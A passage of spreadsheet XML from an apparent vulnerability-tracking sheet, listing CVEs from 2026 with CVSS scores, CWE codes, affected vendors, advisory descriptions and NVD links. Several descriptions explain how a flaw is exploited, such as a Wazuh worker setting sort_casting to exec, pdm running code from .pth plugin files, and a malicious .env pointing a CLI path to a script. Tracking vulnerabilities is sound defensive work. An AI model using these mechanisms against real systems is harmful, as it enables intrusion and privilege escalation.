      </c>
      <c r="M1581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-12737</t>
        </is>
      </c>
    </row>
    <row r="1582">
      <c r="A1582" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0008</t>
        </is>
      </c>
      <c r="C1582" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1582" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1582" s="5" t="inlineStr"/>
      <c r="F1582" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1582" s="5" t="inlineStr"/>
      <c r="H1582" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="I1582" s="5" t="inlineStr">
        <is>
          <t>2026-03-02</t>
        </is>
      </c>
      <c r="J1582" s="5" t="inlineStr"/>
      <c r="K1582" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L1582" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of FaceEnroll.kt, there is a possible privilege escalation due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M1582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0008</t>
        </is>
      </c>
    </row>
    <row r="1583">
      <c r="A1583" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0010</t>
        </is>
      </c>
      <c r="C1583" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1583" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1583" s="5" t="inlineStr"/>
      <c r="F1583" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1583" s="5" t="inlineStr"/>
      <c r="H1583" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="I1583" s="5" t="inlineStr">
        <is>
          <t>2026-03-02</t>
        </is>
      </c>
      <c r="J1583" s="5" t="inlineStr"/>
      <c r="K1583" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1583" s="5" t="inlineStr">
        <is>
          <t>In onTransact of IDrmManagerService.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M1583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0010</t>
        </is>
      </c>
    </row>
    <row r="1584">
      <c r="A1584" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18994</t>
        </is>
      </c>
      <c r="C1584" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1584" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1584" s="5" t="inlineStr"/>
      <c r="F1584" s="5" t="inlineStr"/>
      <c r="G1584" s="5" t="inlineStr"/>
      <c r="H1584" s="5" t="inlineStr"/>
      <c r="I1584" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1584" s="5" t="inlineStr"/>
      <c r="K1584" s="5" t="inlineStr">
        <is>
          <t>CWE-926</t>
        </is>
      </c>
      <c r="L1584" s="5" t="inlineStr">
        <is>
          <t>A potential improper authorization vulnerability was reported in the Lenovo File Manager Android Application, distributed exclusively in the Chinese market, that could allow a local authenticated user to read or modify protected files within the application.</t>
        </is>
      </c>
      <c r="M1584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18994</t>
        </is>
      </c>
    </row>
    <row r="1585">
      <c r="A1585" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19136</t>
        </is>
      </c>
      <c r="C1585" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1585" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1585" s="5" t="inlineStr"/>
      <c r="F1585" s="5" t="inlineStr"/>
      <c r="G1585" s="5" t="inlineStr"/>
      <c r="H1585" s="5" t="inlineStr"/>
      <c r="I1585" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1585" s="5" t="inlineStr"/>
      <c r="K1585" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1585" s="5" t="inlineStr">
        <is>
          <t>A potential command injection vulnerability was reported in the Tianxi AI Agent PC Application, distributed exclusively in the Chinese market, that could allow operating system commands to be executed if a local user opens a specially crafted link that is handled by the application.</t>
        </is>
      </c>
      <c r="M1585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19136</t>
        </is>
      </c>
    </row>
    <row r="1586">
      <c r="A1586" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19843</t>
        </is>
      </c>
      <c r="C1586" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1586" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1586" s="5" t="inlineStr"/>
      <c r="F1586" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1586" s="5" t="inlineStr"/>
      <c r="H1586" s="5" t="inlineStr"/>
      <c r="I1586" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1586" s="5" t="inlineStr"/>
      <c r="K1586" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1586" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in 389-ds-base. The Cockpit 389 Console's LDAP editor constructs an ldapsearch command by embedding an LDAP entry's distinguished name (DN) into a shell command string without proper escaping. An LDAP user with delegated privileges to create or rename directory entries could craft a malicious DN containing shell metacharacters. When a Cockpit administrator subsequently views the entry in the 389 Console, the embedded shell command executes with root privileges on the directory server host.</t>
        </is>
      </c>
      <c r="M1586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19843</t>
        </is>
      </c>
    </row>
    <row r="1587">
      <c r="A1587" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20501</t>
        </is>
      </c>
      <c r="C1587" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1587" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1587" s="5" t="inlineStr"/>
      <c r="F1587" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1587" s="5" t="inlineStr"/>
      <c r="H1587" s="5" t="inlineStr">
        <is>
          <t>mediatek:mt2718, mediatek:mt2718_firmware, mediatek:mt6580, mediatek:mt6580_firmware, mediatek:mt6739, mediatek:mt6739_firmware, mediatek:mt6761, mediatek:mt6761_firmware, mediatek:mt6765, mediatek:mt6765_firmware</t>
        </is>
      </c>
      <c r="I1587" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1587" s="5" t="inlineStr"/>
      <c r="K1587" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1587" s="5" t="inlineStr">
        <is>
          <t>In vdec, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11262030; Issue ID: MSV-9197.</t>
        </is>
      </c>
      <c r="M1587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20501</t>
        </is>
      </c>
    </row>
    <row r="1588">
      <c r="A1588" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20502</t>
        </is>
      </c>
      <c r="C1588" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1588" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1588" s="5" t="inlineStr"/>
      <c r="F1588" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1588" s="5" t="inlineStr"/>
      <c r="H1588" s="5" t="inlineStr">
        <is>
          <t>mediatek:mt2718, mediatek:mt2718_firmware, mediatek:mt6580, mediatek:mt6580_firmware, mediatek:mt6739, mediatek:mt6739_firmware, mediatek:mt6761, mediatek:mt6761_firmware, mediatek:mt6765, mediatek:mt6765_firmware</t>
        </is>
      </c>
      <c r="I1588" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1588" s="5" t="inlineStr"/>
      <c r="K1588" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1588" s="5" t="inlineStr">
        <is>
          <t>In vdec, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11262030; Issue ID: MSV-9196.</t>
        </is>
      </c>
      <c r="M1588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20502</t>
        </is>
      </c>
    </row>
    <row r="1589">
      <c r="A1589" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21085</t>
        </is>
      </c>
      <c r="C1589" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1589" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1589" s="5" t="inlineStr"/>
      <c r="F1589" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1589" s="5" t="inlineStr"/>
      <c r="H1589" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="I1589" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1589" s="5" t="inlineStr"/>
      <c r="K1589" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1589" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Keymaster trustlet prior to SMR Sep-2026 Release 1 allows local privileged attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="M1589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21085</t>
        </is>
      </c>
    </row>
    <row r="1590">
      <c r="A1590" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21101</t>
        </is>
      </c>
      <c r="C1590" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1590" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1590" s="5" t="inlineStr"/>
      <c r="F1590" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1590" s="5" t="inlineStr"/>
      <c r="H1590" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="I1590" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1590" s="5" t="inlineStr"/>
      <c r="K1590" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1590" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in DualDAR driver prior to SMR Sep-2026 Release 1 allows local privileged attackers to potentially execute arbitrary code with root privilege.</t>
        </is>
      </c>
      <c r="M1590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21101</t>
        </is>
      </c>
    </row>
    <row r="1591">
      <c r="A1591" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4130</t>
        </is>
      </c>
      <c r="C1591" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1591" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1591" s="5" t="inlineStr"/>
      <c r="F1591" s="5" t="inlineStr"/>
      <c r="G1591" s="5" t="inlineStr"/>
      <c r="H1591" s="5" t="inlineStr"/>
      <c r="I1591" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1591" s="5" t="inlineStr"/>
      <c r="K1591" s="5" t="inlineStr">
        <is>
          <t>CWE-312</t>
        </is>
      </c>
      <c r="L1591" s="5" t="inlineStr">
        <is>
          <t>There is a storage of sensitive information in cleartext vulnerability in NI SystemLink. This vulnerability may allow an attacker with local access to obtain sensitive information stored by the system in the clear.  This vulnerability affects NI SystemLink and NI SystemLink Server 2026 Q3 and prior versions.</t>
        </is>
      </c>
      <c r="M1591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4130</t>
        </is>
      </c>
    </row>
    <row r="1592">
      <c r="A1592" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42805</t>
        </is>
      </c>
      <c r="C1592" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1592" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1592" s="5" t="inlineStr"/>
      <c r="F1592" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1592" s="5" t="inlineStr"/>
      <c r="H1592" s="5" t="inlineStr"/>
      <c r="I1592" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1592" s="5" t="inlineStr"/>
      <c r="K1592" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1592" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability exists in the Bosch Sensortec BHI385 SensorAPI (C library) within the debug message parser function bhi385_parse_debug_message (located in bhi385_parse.c). 
The function parses FIFO events and extracts an 8-bit message length directly from the attacker-controlled event payload (callback_info-&gt;data_ptr[0]) without enforcing bounds checks or clamping the value.
When copying the payload into a fixed-size stack buffer of 17 bytes (uint8_t debug_msg[17]) via memcpy, providing a length byte greater than 16 causes the function to write past the allocated stack boundary. 
This memory corruption can be triggered by a malicious or compromised sensor or bus participant, leading to a firmware crash, Denial of Service (DoS), or potentially the execution of arbitrary code via adjacent stack data corruption.</t>
        </is>
      </c>
      <c r="M1592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42805</t>
        </is>
      </c>
    </row>
    <row r="1593">
      <c r="A1593" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44901</t>
        </is>
      </c>
      <c r="C1593" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1593" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1593" s="5" t="inlineStr"/>
      <c r="F1593" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1593" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1593" s="5" t="inlineStr"/>
      <c r="I1593" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1593" s="5" t="inlineStr"/>
      <c r="K1593" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1593" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.0.0 until 4.14.6 and 5.0.0-beta2, AffectedItemsWazuhResult.merge() in framework/wazuh/core/results.py trusts the sort_casting field in a cluster worker's JSON response. During a distributed API merge, attacker-controlled type names are resolved through Python builtins without an allowlist. A compromised worker can set sort_casting to exec and place Python source in affected_items, causing the master to execute the payload as root when responses from multiple nodes are merged. This issue is fixed in versions 4.14.6 and 5.0.0-beta2.</t>
        </is>
      </c>
      <c r="M1593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44901</t>
        </is>
      </c>
    </row>
    <row r="1594">
      <c r="A1594" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47211</t>
        </is>
      </c>
      <c r="C1594" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1594" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1594" s="5" t="inlineStr"/>
      <c r="F1594" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1594" s="5" t="inlineStr"/>
      <c r="H1594" s="5" t="inlineStr"/>
      <c r="I1594" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1594" s="5" t="inlineStr"/>
      <c r="K1594" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L1594" s="5" t="inlineStr">
        <is>
          <t>Ouroboros is a local-first runtime for AI coding agents that records their actions and applies user-defined policies to constrain behavior. In versions prior to 0.39.0, if a user clones a malicious repository and runs Ouroboros commands within that directory, it can lead to arbitrary code execution and potential system takeover. The vulnerability stems from Ouroboros loading the .env file from the current working directory. Execution-affecting environment variables such as OUROBOROS_CLI_PATH, OPENCODE_CLI_PATH, and other backend selectors are accepted directly from this local .env. An attacker can include a malicious script in the repository and point the CLI path variable to it (e.g., OUROBOROS_CLI_PATH=./malicious_script.sh). When the user executes a command like ouroboros init or any command that instantiates the adapter, the malicious script is executed instead of the intended CLI. This issue has been fixed in version 0.39.0.</t>
        </is>
      </c>
      <c r="M1594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47211</t>
        </is>
      </c>
    </row>
    <row r="1595">
      <c r="A1595" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47764</t>
        </is>
      </c>
      <c r="C1595" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1595" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1595" s="5" t="inlineStr"/>
      <c r="F1595" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1595" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1595" s="5" t="inlineStr"/>
      <c r="I1595" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1595" s="5" t="inlineStr"/>
      <c r="K1595" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1595" s="5" t="inlineStr">
        <is>
          <t>pdm is a Python package and dependency manager supporting the latest PEP standards. Versions prior to 2.27.0 are vulnerable to path traversal through write_to_fs. InstallDestination.write_to_fs() in src/pdm/installers/installers.py overrides the base class to add symlink/hardlink support but replaces the safe _path_with_destdir() (which validates via Path.resolve() + is_relative_to()) with a bare os.path.join() that performs no path validation. A malicious wheel with traversal entries can write arbitrary files. This issue has been fixed in version 2.27.0.</t>
        </is>
      </c>
      <c r="M1595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47764</t>
        </is>
      </c>
    </row>
    <row r="1596">
      <c r="A1596" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47781</t>
        </is>
      </c>
      <c r="C1596" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1596" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1596" s="5" t="inlineStr"/>
      <c r="F1596" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1596" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1596" s="5" t="inlineStr"/>
      <c r="I1596" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1596" s="5" t="inlineStr"/>
      <c r="K1596" s="5" t="inlineStr">
        <is>
          <t>CWE-829, CWE-94</t>
        </is>
      </c>
      <c r="L1596" s="5" t="inlineStr">
        <is>
          <t>PDM is a Python package and dependency manager. In versions up to and including 2.26.9, PDM automatically loads project-local plugins from a .pdm-plugins directory during initialization, allowing an attacker-controlled file in an untrusted repository checkout to execute arbitrary Python code before any command is parsed. This happens because load_plugins() runs during Core.init() and adds .pdm-plugins via site.addsitedir(), which processes .pth files and immediately executes any line beginning with import, so the code runs with the privileges of the user invoking pdm and even a benign command such as pdm --version triggers it (making the impact strongest in CI, automation, and privileged contexts). The issue is fixed in version 2.27.0.</t>
        </is>
      </c>
      <c r="M1596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47781</t>
        </is>
      </c>
    </row>
    <row r="1597">
      <c r="A1597" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52491</t>
        </is>
      </c>
      <c r="C1597" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1597" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1597" s="5" t="inlineStr"/>
      <c r="F1597" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1597" s="5" t="inlineStr">
        <is>
          <t>db2</t>
        </is>
      </c>
      <c r="H1597" s="5" t="inlineStr"/>
      <c r="I1597" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1597" s="5" t="inlineStr"/>
      <c r="K1597" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1597" s="5" t="inlineStr">
        <is>
          <t>An issue in libtiff 85f2ac8e0b01cb7db2bbecf4a3b891bdbef67938 allows an attacker to execute arbitrary code via the libtiff/tools/thumbnail.c: main() component</t>
        </is>
      </c>
      <c r="M1597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52491</t>
        </is>
      </c>
    </row>
    <row r="1598">
      <c r="A1598" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52875</t>
        </is>
      </c>
      <c r="C1598" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1598" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1598" s="5" t="inlineStr"/>
      <c r="F1598" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1598" s="5" t="inlineStr"/>
      <c r="H1598" s="5" t="inlineStr"/>
      <c r="I1598" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1598" s="5" t="inlineStr"/>
      <c r="K1598" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="L1598" s="5" t="inlineStr">
        <is>
          <t>Streambert is a cross-platform Electron Desktop App to stream and download video content. Prior to 2.6.0, the perform-scheduled-backup IPC handler in src/ipc/storage.js takes settings.path from a renderer-supplied object and uses the resulting directory for fs.mkdirSync, fs.writeFileSync, fs.readdirSync, and fs.unlinkSync operations without checking that it is inside an authorized backup location. A compromised renderer can choose an absolute path or a relative traversal path to create directories and write a streambert-backup-[timestamp].json file containing renderer-controlled data. The pruning loop can also delete files in that directory whose names begin with streambert-backup- and end with .json. This vulnerability is fixed in 2.6.0.</t>
        </is>
      </c>
      <c r="M1598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52875</t>
        </is>
      </c>
    </row>
    <row r="1599">
      <c r="A1599" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53091</t>
        </is>
      </c>
      <c r="C1599" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1599" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1599" s="5" t="inlineStr"/>
      <c r="F1599" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1599" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H1599" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I1599" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J1599" s="5" t="inlineStr"/>
      <c r="K1599" s="5" t="inlineStr">
        <is>
          <t>CWE-131</t>
        </is>
      </c>
      <c r="L1599" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: pull headers in qdisc_pkt_len_segs_init()
Most ndo_start_xmit() methods expects headers of gso packets
to be already in skb-&gt;head.
net/core/tso.c users are particularly at risk, because tso_build_hdr()
does a memcpy(hdr, skb-&gt;data, hdr_len);
qdisc_pkt_len_segs_init() already does a dissection of gso packets.
Use pskb_may_pull() instead of skb_header_pointer() to make
sure drivers do not have to reimplement this.
Some malicious packets could be fed, detect them so that we can
drop them sooner with a new SKB_DROP_REASON_SKB_BAD_GSO drop_reason.</t>
        </is>
      </c>
      <c r="M1599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53091</t>
        </is>
      </c>
    </row>
    <row r="1600">
      <c r="A1600" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54369</t>
        </is>
      </c>
      <c r="C1600" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1600" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1600" s="5" t="inlineStr"/>
      <c r="F1600" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1600" s="5" t="inlineStr"/>
      <c r="H1600" s="5" t="inlineStr"/>
      <c r="I1600" s="5" t="inlineStr">
        <is>
          <t>2026-06-29</t>
        </is>
      </c>
      <c r="J1600" s="5" t="inlineStr"/>
      <c r="K1600" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L1600" s="5" t="inlineStr">
        <is>
          <t>acl before version 2.4.0 contains a symlink traversal vulnerability in the libacl pathname-based functions acl_get_file(), acl_set_file(), acl_extended_file(), and acl_delete_def_file() that allows local attackers to escalate privileges by replacing any pathname component with a symbolic link. Attackers who control any component of a pathname processed by a privileged caller can redirect ACL read or write operations to arbitrary files or directories, enabling unauthorized manipulation of access control lists and local privilege escalation.</t>
        </is>
      </c>
      <c r="M1600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54369</t>
        </is>
      </c>
    </row>
    <row r="1601">
      <c r="A1601" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54371</t>
        </is>
      </c>
      <c r="C1601" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1601" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1601" s="5" t="inlineStr"/>
      <c r="F1601" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1601" s="5" t="inlineStr"/>
      <c r="H1601" s="5" t="inlineStr"/>
      <c r="I1601" s="5" t="inlineStr">
        <is>
          <t>2026-06-29</t>
        </is>
      </c>
      <c r="J1601" s="5" t="inlineStr"/>
      <c r="K1601" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L1601" s="5" t="inlineStr">
        <is>
          <t>attr before version 2.6.0 contains a symlink traversal vulnerability in the getfattr and setfattr utilities that allows local attackers to escalate privileges by replacing a pathname component with a symbolic link during directory hierarchy traversal. Attackers who control a pathname component can redirect getfattr and setfattr operations to arbitrary files by substituting a symlink, leading to local privilege escalation when getfattr or setfattr is invoked by a privileged process over an attacker-controlled path.</t>
        </is>
      </c>
      <c r="M1601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54371</t>
        </is>
      </c>
    </row>
    <row r="1602">
      <c r="A1602" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55581</t>
        </is>
      </c>
      <c r="C1602" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1602" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1602" s="5" t="inlineStr"/>
      <c r="F1602" s="5" t="n">
        <v>0.003</v>
      </c>
